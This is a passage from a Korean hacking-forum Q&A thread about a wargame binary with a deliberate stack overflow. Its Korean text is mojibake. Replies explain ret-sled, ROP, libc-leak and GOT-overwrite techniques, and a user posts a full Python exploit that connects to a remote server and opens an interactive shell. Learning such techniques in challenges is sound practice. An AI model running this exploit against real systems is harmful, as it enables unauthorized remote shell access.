½Ã½ºÅÛ ÇØÅ·

 1574, 7/79 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   vngkv123
   ¹®Á¦ ¹æÇ⼺...

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=1847 [º¹»ç]


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>


void err(const char *message)
{
    puts(message);
    exit(-1);
}


void vuln(size_t size)
{
    char buf[size];

    read(0, buf, 0x400);
}


int main(int argc, char *argv[])
{
    int fd;
    int seed;
    size_t size;

    setvbuf(stdin, 0, _IONBF, 0);
    setvbuf(stdout, 0, _IONBF, 0);

    fd = open("/dev/urandom", 0);
    if (fd < 0) err("/dev/urandom");
    read(fd, &seed, 4);
    close(fd);

    srand(seed);

    size = (rand() % (0x3a0 - 0x100)) + 0x100;
    size &= 0xFFFFFFFC;

    puts("Executing vuln(). good luck :)");
    vuln(size);

    return 0;
}

¾à°£ BugBug¹®Á¦¸¦ ¸ðƼºê·Î ¸¸µç ´À³¦ÀÌ ÀÖ±äÇѵ¥..
¿ø°Ý¼­¹ö¿¡¼­ µ¥¸óÀ¸·Î µ¹¾Æ°¡°í NX´Â °É¸°»óÅ°í ASLRÀº ¾ÆÁ÷ Àß ¸ð¸£°Ú³×¿ë.
ÀÌ°Ç Àú ·£µå°ªÀ» LeakÇؼ­ Çϴ°ɱî¿ä ¾Æ´Ï¸é rand°ªÀ¸·Î ³ª¿Â »çÀÌÁî »ó°ü¾øÀÌ ret sled¸¦ Ÿ¼­ Çϴ°ɱî¿ä...
  Hit : 2405     Date : 2017/04/04 06:04


    
ÇØÄð·¯ ret sleddingÇ϶ó´Â ¹®Á¦ ¸Â½À´Ï´Ù
¹öÆÛ°¡ 0x100~0x3a0Áß¿¡ »çÀÌÁî°¡ Á¤ÇØÁ®¼­ ÇÒ´çµÇ´Âµ¥
Ç×»ó 0x400¹ÙÀÌÆ®¸¸Å­ readÇϴϱî
ÃÖ¼Ò 0x60, 96¹ÙÀÌÆ®¸¸Å­ºÎÅÍ´Â ¹«Á¶°Ç retÀ» Ÿ°Ô µÅÀÖÀ¸´Ï
RET Sledding À¸·Î ½ÇÇàÈ帧À» º¯Á¶ÇÏ¸é µÇ´Â°Ç ¸Â´Âµ¥
ASLRÀº ¾ÆÁ÷ ¸ð¸£°Ú´Ù°í Çϼ̴µ¥ ASLR °É·ÁÀÖÀ»°Å±¸¿ä
ROPÇؼ­ libc leakÇѹø ÇÏ°í got overwriteÇؼ­ ½© µû½Ç ¼ö ÀÖ±¸¿ä
Ç÷¡±× ÆÄÀϸ¸ ÀÐÀ¸¸é µÇ¸é ±×³É ¿ø¼¦¿¡µµ °¡´ÉÇÕ´Ï´Ù		 2017/04/05  
pwnnnt °«.. 2017/04/05  
vngkv123 retÀ» óÀ½ºÎÅÍ Å¸´Â°Å ¸ÂÁÒ? ¿Ö ÁÖ¼Ò°¡ ¸¯ÀÌ ¾ÈµÇ´Â°É±î¿ë ¤Ð_¤Ð ÈÉ 2017/04/05  
vngkv123 retÀ» ÃæºÐÈ÷ÁÖ°í puts@plt + dummy + read³ª putsÀÇ got·Î ¿ì¼± ¸¯ÇÒ·Á°í Çߴµ¥ À߸øµÈ°É±î¿ä? 2017/04/05  
ÇØÄð·¯ ±×·¸°ÔÇÏ¸é µÇ´Â°Å ¸Â½À´Ï´Ù
retÀº ¹öÆÛÀÇ Å©±â¸¶´Ù Ÿ±â ½ÃÀÛÇÏ´Â ½ÃÁ¡ÀÌ ´Þ¶óÁöÁÒ
retÀº ÃÖ´ë ¹öÆÛÅ©±âÀÎ 0x3a0À» ±âÁØÀ¸·Î ÇßÀ» ¶§
Á» ¾ÈÁ¤ÀûÀ¸·Î ÇÏ·Á¸é 0x3c0/4 °³¸¸Å­ ³ÖÀ¸½Å´ÙÀ½¿¡ ROP Æä1À̷ε带 ¾²½Ã¸é µË´Ï´Ù		 2017/04/05  
vngkv123 gotÁÖ¼Ò°¡ À½¼ö·Î ³ª¿À¸é ¹º°¡ À߸øµÈ°Å°ÚÁÒ ... 2017/04/05  
vngkv123 import socket
import time
import struct

p = lambda x : struct.pack("<L",x)
up = lambda x : struct.unpack("<L",x)

read_plt = 0x8048420
read_got = 0x804a00c
puts_plt = 0x8048430
ret = 0x8048623
dynamic_section = 0x8049f14
pppr = 0x8048749
system_offset = 0x3ada0
read_offset = 0xd5980

payload = ''
payload += p(ret)*240 + p(read_plt) + p(pppr)
payload += p(0) + p(dynamic_section) + p(len("/bin/sh")+1) #/bin/sh
payload += p(puts_plt) + p(0x8048766) + p(read_got) #get read addr
payload += p(read_plt) + p(pppr)
payload += p(0) + p(read_got) + p(4) #overwrite read@got
payload += p(read_plt) + "AAAA" + p(dynamic_section)


s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('xxx.xxx.xxx.xxx',31007))
time.sleep(0.5)
print"[+] Sending payload ......"
s.send(payload + '\n')
time.sleep(0.5)
s.recv(1024)
s.send("/bin/sh" + "\n")
time.sleep(0.5)
resp = up(s.recv(4))
libc_addr = resp - read_offset
print"[+] libc_addr = %s"%(hex(libc_addr))
system_addr = libc_addr + system_offset
print"[+] system_addr = %s"%(hex(system_addr))
time.sleep(0.5)
s.send(p(system_addr) + '\n')
time.sleep(0.5)
print'[+] Get shell complete.......'
while True:
cmd = raw_input("$ ")
s.send(cmd + '\n')
time.sleep(0.5)
print(s.recv(1024))
s.close()

ÁÖ¼Ò´Â °¡¸°°Å±¸¿ë À§ ÄÚµå»óÀ¸·Ð ¸Â°Ô Â¥¿©ÁøÁö ¸ð¸£°Ú³×¿ä.... ÀÚ²Ù up(s.recv)ºÎºÐ¿¡¼­ »àÀ̳ª¼­ °í¹ÎÁßÀε¥ ¤Ð		 2017/04/06  
ÇØÄð·¯ struct.unpackÀº ¹è¿­À» ¸®ÅÏÇÕ´Ï´Ù
up = lambda x : struct.unpack("<L",x)
->
up = lambda x : struct.unpack("<L",x)[0]		 2017/04/06  
vngkv123 shellÀÌ µû º´Ù°í »ý°¢µÇ´Â »óȲ¿¡¼­ raw_input ÁöÁ¡ºÎÅÍ strace¸¦ ºÙ¿©¼­ ”f´Âµ¥

read(0, ÇÔ¼ö·Î ½ÃÀ۵ǰí Àִ°Ÿé got overwrite°¡ À߸øµÈ°Ç°¡¿ä?		 2017/04/06  
ÇØÄð·¯ °Å±âºÎÅÍ ºÙÀÌÁö¸¶½Ã°í connectÁ÷ÈÄ¿¡ ºÙÀ̼ſä 2017/04/06  
vngkv123 ¹¹°¡ ¹®Á¨Áö °í¹Î°è¼Ó Ç޴µ¥ offsetÀÌ À߸øµÇ¾ú¾ú³×¿ä ¤Ì¤Ì ¤»¤»¤»¤» °¨»çÇÕ´Ï´Ù~~ 2017/04/06  
1454   ¹öÆÛ¿À¹öÇÃ·Î¿ì °ü·Ã Áú¹®..[1]     ewqqw
 04/17 2320
1453   ubuntu 16.04 UAF¹ö±×..[10]     vngkv123
 04/16 3096
1452   gdb ºÐ¼® disas[5]     ewqqw
 04/16 2122
1451   pwntools ¸¦ ÀÌ¿ëÇÑ Àͽº Áú¹®[6]     tkakr7458
 04/16 7234
1450   ¹öÆÛ¿À¹öÇ÷οì Áú¹®....[2]     ewqqw
 04/16 2272
1449   IDA¿¡¼­ ¼Ò½ºÄڵ带 º¹¿øÇßÀ»¶§[5]     vngkv123
 04/13 3516
1448   aslr ȯ°æ¿¡¼­...[2]     vngkv123
 04/12 2518
1447   asis CTF ¹®Á¦Ç®´Ù°¡....[4]     vngkv123
 04/12 2233
1446   pwnable kr OTP¹®Á¦...[2]     vngkv123
 04/09 2755
1445   64bit elfÆÄÀÏ µð¹ö±ë½Ã[6]     vngkv123
 04/08 2485
1444   gdb¿¡¼­...[2]     vngkv123
 04/05 2140
  ¹®Á¦ ¹æÇ⼺...[11]     vngkv123
 04/04 2404
1442   2013 plaid ctf rop ..[14]     vngkv123
 04/02 2454
1441   python Æä1À̷εå ÀÛ¼º½Ã[1]     vngkv123
 04/02 1895
1440   ¿ë¾îµé Áú¹®..[6]     vngkv123
 04/01 2339
1439   strippedµÈ ¹ÙÀ̳ʸ®ÆÄÀÏÀ» µð¹ö±ëÇÒ¶§...[5]     vngkv123
 04/01 2511
1438   fc10 fc14...[1]     vngkv123
 04/01 2043
1437   gdb¿¡¼­ callÀÌÈÄ ºê·¹ÀÌÅ©¸¦ °É¾úÀ»¶§..[10]     vngkv123
 03/31 2003
1436   ¸®ÅÏ°ú °ü·ÃÇÑ Áú¹®....[9]     vngkv123
 03/30 1938
1435   rop gadgetãÀ» ¶§....[1]     vngkv123
 03/30 2111
[1][2][3][4][5][6] 7 [8][9][10]..[79]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org